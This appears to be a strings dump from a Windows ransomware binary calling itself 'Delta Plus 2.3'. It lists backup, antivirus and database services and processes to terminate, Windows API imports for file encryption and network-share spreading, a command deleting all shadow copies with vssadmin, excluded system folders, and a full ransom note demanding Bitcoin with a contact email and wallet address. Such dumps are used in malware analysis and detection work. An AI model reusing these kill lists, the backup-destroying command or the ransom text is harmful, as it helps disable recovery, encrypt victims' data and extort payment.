!This program cannot be run in DOS mode.
`.data
.idata
@.reloc
memtas
mepocs
sophos
backup
GxCIMgr
DefWatch
ccEvtMgr
ccSetMgr
SavRoam
RTVscan
QBFCService
QBIDPService
Intuit.QuickBooks.FCS
QBCFMonitorService
YooBackup
zhudongfangyu
sophos
stc_raw_agent
VSNAPVSS
VeeamTransportSvc
VeeamDeploymentService
VeeamNFSSvc
PDVFSService
BackupExecVSSProvider
BackupExecAgentAccelerator
BackupExecAgentBrowser
BackupExecDiveciMediaService
BackupExecJobEngine
BackupExecManagementService
BackupExecRPCService
AcrSch2Svc
AcronisAgent
CASAD2DWebSvc
CAARCUpdateSvc
IsWow64Process
kernel32.dll
kernel32.dll
Wow64DisableWow64FsRedirection
kernel32.dll
Wow64RevertWow64FsRedirection
, Error Code:
Can't OpenProcess
ATTENTION!
Don't worry, you can return all your files!
All your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.
The only method of recovering files is to purchase decrypt tool and unique key for you Delta Plus 2.3.
This software will decrypt all your encrypted files.
What guarantees you have?
Payment can be made in Bitcoin only.
Contact: decryptdelta@gmail.com
Bitcoin Address: 3JG36KY6abZTnHBdQCon1hheC3Wa2bdyqs
1. Decoding cost
The cost of decryption is $6500 dollars USD. We receive payment only in BITCOINS. (Bitcoin is a form of digital currency)
Discount 50% available if you contact us first 72 hours, that's price for you is $3250 dollars USD.
2. Attention!
Do not rename encrypted files.
Do not try to decrypt your data using third party software, it may cause permanent data loss.
Do not trust anyone! Only we have keys to your files! Without this keys restore your data is impossible.
3. Free decryption as guarantee
You can send us up to 1 file for free decryption.
Size of file must be less than 1 Mb (non archived). We don`t decrypt for test DATABASE, XLS and other important files. Remember this.
4. Decryption process:
To decrypt the files, transfer money to our bitcoin wallet number: "3JG36KY6abZTnHBdQCon1hheC3Wa2bdyqs". As we receive the money we will send you:
1. Decryption program.
2. Detailed instruction for decryption.
3. And individual keys for decrypting your files.
5. The process of buying bitcoins:
The easiest way to buy bitcoins: https://bitfy.app/
https://localbitcoins.com/
https://www.bitpanda.com/
https://paxful.com/
https://www.abra.com/
IMPORTANT! Don`t use coinbase! it take more than 2 week to make coinbase verification. P.S. The easiest way to buy bitcoins in CHINA: https://www.huobi.com/ https://www.bitoex.com/
Can't RmGetList
Can't RmRegisterResources
Can't RmStartSession
Can't open file after killHolder
Can't MoveFileExW
Can't FindFirstFileW
Can't FindFirstFileW
DoYouWantToHaveSexWithCuongDong
DoYouWantToHaveSexWithCuongDong
AQLwH'
.rdata
.rdata$zzzdbg
.text$di
.text$mn
.idata$5
.idata$2
.idata$3
.idata$4
.idata$6
.CRT$XCU
FindFirstVolumeW
FindNextVolumeW
FindVolumeClose
GetDriveTypeW
GetVolumePathNamesForVolumeNameW
CloseHandle
GetLastError
GetCurrentProcess
TerminateProcess
OpenProcess
GetTickCount
GetModuleHandleA
GetProcAddress
LoadLibraryA
lstrcmpW
lstrlenW
SetVolumeMountPointW
CreateToolhelp32Snapshot
Process32FirstW
Process32NextW
CreateFileW
WriteFile
InitializeCriticalSection
EnterCriticalSection
LeaveCriticalSection
DeleteCriticalSection
lstrlenA
GetCommandLineW
FindClose
FindFirstFileW
FindNextFileW
GetFileSizeEx
GetLogicalDrives
ReadFile
SetFileAttributesW
SetFilePointerEx
WaitForSingleObject
CreateMutexA
WaitForMultipleObjects
GetCurrentProcessId
ExitProcess
CreateThread
ExitThread
SetProcessShutdownParameters
GetSystemInfo
lstrcmpiW
lstrcpyW
lstrcatW
OpenMutexA
MoveFileExW
WideCharToMultiByte
HeapAlloc
HeapFree
GetProcessHeap
ReleaseSemaphore
CreateSemaphoreA
KERNEL32.dll
wsprintfA
USER32.dll
CryptAcquireContextW
CloseServiceHandle
ControlService
EnumDependentServicesA
OpenSCManagerA
OpenServiceA
QueryServiceStatusEx
CryptReleaseContext
CryptGenRandom
ADVAPI32.dll
ShellExecuteW
CommandLineToArgvW
SHEmptyRecycleBinA
SHELL32.dll
NetShareEnum
NetApiBufferFree
NETAPI32.dll
RmStartSession
RmEndSession
RmRegisterResources
RmGetList
RstrtMgr.DLL
WNetGetConnectionW
WNetOpenEnumW
WNetEnumResourceW
WNetCloseEnum
MPR.dll
5$5+52595@5G5N5
6'686o6
7(7.767@7t7
7&848t8
9(9<9R9h9
:2:<:b:
= =/=:=A=N=T=[=k=v=}=
0"0A0V0h0
121D1Q1p1
2/2W2i2o2y2
3 3)373<3F3W3
444E4N4_4h4y4
5$565^5p5v5
5,616;6L6
7 717Y7k7q7{7
:!:.:?:D:Q:d:
<;<H<i<{<
=(=2=B=Z=
?A?N?W?a?y?
;0W0z0
:7=J=l=
444c7v7
>"?2?P?h?~?
0 0$0(0,0004080<0@0D0H0L0P0T0X0\0`0d0h0l0p0t0x0|0
1 1$1(14181<1@1D1H1L1P1T1X1\1`1d1h1l1p1t1x1|1
sql.exe
oracle.exe
ocssd.exe
dbsnmp.exe
synctime.exe
agntsvc.exe
isqlplussvc.exe
xfssvccon.exe
mydesktopservice.exe
ocautoupds.exe
encsvc.exe
firefox.exe
tbirdconfig.exe
mydesktopqos.exe
ocomm.exe
dbeng50.exe
sqbcoreservice.exe
excel.exe
infopath.exe
msaccess.exe
mspub.exe
onenote.exe
outlook.exe
powerpnt.exe
steam.exe
thebat.exe
thunderbird.exe
visio.exe
winword.exe
wordpad.exe
notepad.exe
/c vssadmin.exe delete shadows /all /quiet
cmd.exe
AppData
Windows
Windows.old
Tor Browser
Internet Explorer
Google
Opera Software
Mozilla
Mozilla Firefox
$Recycle.Bin
ProgramData
All Users
autorun.inf
boot.ini
bootfont.bin
bootsect.bak
bootmgr
bootmgr.efi
bootmgfw.efi
desktop.ini
iconcache.db
ntuser.dat
ntuser.dat.log
ntuser.ini
thumbs.db
Program Files
Program Files (x86)
#recycle
.delta
\Help Restore Your Files.txt
Help Restore Your Files.txt
.delta
ADMIN$
shares